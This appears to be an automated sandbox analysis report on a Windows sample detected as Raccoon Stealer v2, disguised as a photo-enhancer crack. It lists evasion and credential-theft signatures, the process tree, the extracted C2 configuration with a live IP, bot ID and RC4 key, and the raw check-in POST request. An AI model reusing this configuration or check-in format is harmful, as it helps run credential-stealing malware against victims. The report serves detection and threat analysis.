Edit tour

Windows Analysis Report
KbqArOlW06.exe

Overview

General Information

Sample Name:	KbqArOlW06.exe
Analysis ID:	679264
MD5:	005297e7c0d555822b5a6f31fcdc7661
SHA1:	9d5f9d90a1574c333ec68dbc800cb70397a1826d
SHA256:	6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
Tags:	exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic

Yara detected Raccoon Stealer v2

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Query firmware table information (likely to detect VMs)

.NET source code contains potential unpacker

Tries to evade analysis by execution special instruction (VM detection)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Hides threads from debuggers

Obfuscated command line found

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

PE file contains strange resources

Drops PE files

Checks if the current process is being debugged

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Entry point lies outside standard sections

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to launch a program with higher privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

System is w10x64

KbqArOlW06.exe (PID: 2740 cmdline: "C:\Users\user\Desktop\KbqArOlW06.exe" MD5: 005297E7C0D555822B5A6F31FCDC7661)

2.0.0-beta2.cps.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe" MD5: 881CBC2DA4C6467AEC519F4909371AF8)

A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" MD5: B184AD382E1729FEEA1E7BB94307930F)

A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp (PID: 5096 cmdline: "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" MD5: D8467CA1F529C6C6DECB1B82DBAED1DF)

cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
Process Memory Space: 2.0.0-beta2.cps.exe PID: 2332	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.KbqArOlW06.exe.16636690.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16726700.2.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.18de6818.7.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.166866c8.1.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16866738.3.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.18de6818.7.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16636690.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16726700.2.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16866738.3.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16ae6770.4.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.179e67e0.6.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.166866c8.1.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.KbqArOlW06.exe.16fe67a8.5.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
Click to see the 16 entries

Snort Signatures

ET TROJAN Win32/RecordBreaker CnC Checkin - Source IP: 192.168.2.4 - Destination IP: 51.195.166.178

Timestamp:	192.168.2.451.195.166.17849778802036934 08/05/22-13:54:12.723337
SID:	2036934
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response - Source IP: 51.195.166.178 - Destination IP: 192.168.2.4

Timestamp:	51.195.166.178192.168.2.480497782036955 08/05/22-13:54:12.825297
SID:	2036955
Source Port:	80
Destination Port:	49778
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 51.195.166.178Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6

System Summary

PE file contains section with special chars

Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: section name: .a\|D
Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: section name: .=xC

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_004088C0	21_2_004088C0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00490830	22_2_00490830
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004688B8	22_2_004688B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00482CD8	22_2_00482CD8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00472090	22_2_00472090
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00452194	22_2_00452194
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0043E240	22_2_0043E240
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0043083C	22_2_0043083C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0046A974	22_2_0046A974
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004449B8	22_2_004449B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00434AB4	22_2_00434AB4
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00444F60	22_2_00444F60
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0048908C	22_2_0048908C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004313C8	22_2_004313C8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00445658	22_2_00445658
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004357B8	22_2_004357B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0045F954	22_2_0045F954
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00445A64	22_2_00445A64
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0045BA04	22_2_0045BA04
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00489FEC	22_2_00489FEC

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Process Stats: CPU usage > 98%

Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: sqlite3.dll.16.dr

Static PE information: Number of sections : 18 > 10

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		21_2_00409920
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		22_2_00455E14

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00453B40 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 0040909C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 0040596C appears 114 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 004587AC appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00403400 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 004585A0 appears 124 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00406F54 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00403494 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00446594 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 0040357C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 004462C4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 004349CC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00403684 appears 233 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: String function: 00407D84 appears 43 times

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00424014 NtdllDefWindowProc_A,	22_2_00424014
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00412A68 NtdllDefWindowProc_A,	22_2_00412A68
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0047AC34 NtdllDefWindowProc_A,	22_2_0047AC34
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0042FA00 NtdllDefWindowProc_A,	22_2_0042FA00
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00457E24 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	22_2_00457E24

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_0042EDC4: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

22_2_0042EDC4

Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: KbqArOlW06.exe

Static PE information: No import functions for PE file found

Source: KbqArOlW06.exe, 00000000.00000002.469170712.0000000001122000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
Source: KbqArOlW06.exe, 00000000.00000002.472580658.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs KbqArOlW06.exe
Source: KbqArOlW06.exe	Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe

Source: KbqArOlW06.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KbqArOlW06.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.log

Jump to behavior

Source: classification engine

Classification label: mal60.troj.spyw.evad.winEXE@7/13@0/1

Source: C:\Users\user\Desktop\KbqArOlW06.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

Code function: 21_2_0040A10C FindResourceA,SizeofResource,LoadResource,LockResource,

21_2_0040A10C

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: KbqArOlW06.exe	Virustotal: Detection: 26%
Source: KbqArOlW06.exe	Metadefender: Detection: 28%
Source: KbqArOlW06.exe	ReversingLabs: Detection: 69%

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KbqArOlW06.exe "C:\Users\user\Desktop\KbqArOlW06.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		21_2_00409920
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		22_2_00455E14

Source: C:\Users\user\Desktop\KbqArOlW06.exe

File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_0045663C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

22_2_0045663C

Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: KbqArOlW06.exe	Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

Mutant created: \Sessions\1\BaseNamedObjects\CCOYS///hdr

Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Window found: window name: TSelectLanguageForm

Jump to behavior

